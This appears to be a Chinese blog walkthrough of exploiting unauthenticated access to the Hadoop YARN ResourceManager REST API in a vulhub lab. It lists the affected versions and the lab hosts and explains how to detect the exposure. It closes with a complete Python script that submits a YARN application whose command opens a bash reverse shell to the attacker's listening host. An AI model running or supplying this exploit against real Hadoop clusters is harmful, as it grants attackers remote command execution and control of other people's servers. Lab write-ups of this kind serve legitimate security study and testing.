赞
踩
hadoop是一个有apache基金会开发的分布式文件系统,一个存储系统+计算框架的软件框架。主要解决海量数据存储与计算的问题,yarn是搭建在其上的对集群资源实现同一管理的资源管理平台。由于服务器的配置不当开放了HFDS的50070及相关服务端口,导致攻击者可以利用命令行直接操作多个目录下的数据(删除、下载、甚至命令执行)
2.9.0 <= Apache Hadoop <= 2.10.1``3.0.0-alpha <= Apache Hadoop <= 3.2.3``3.3.0 <= Apache Hadoop <= 3.3.3
本地虚拟机:ubuntu:192.168.253.250
搭建工具:docker-compose
靶场环境:vulhub
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WTjgmEXR-1684508902067)(Hadoop_unauthorized-yarn.assets/image-20230507105159174.png)]
攻击主机:centos7.0 :192.168.253.145
监听主机:kali :192.168.253.135
访问对应的8088端口:
访问就跳转到cluster目录,我们继续访问当前目录的apps路径,如果存在则说明有未授权访问
同时在网站页面上出现记录:
附脚本:
import requests target = 'http://192.168.253.250:8088/' #http://远端服务器的ip:port lhost = '192.168.253.135' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/4444 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data)
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。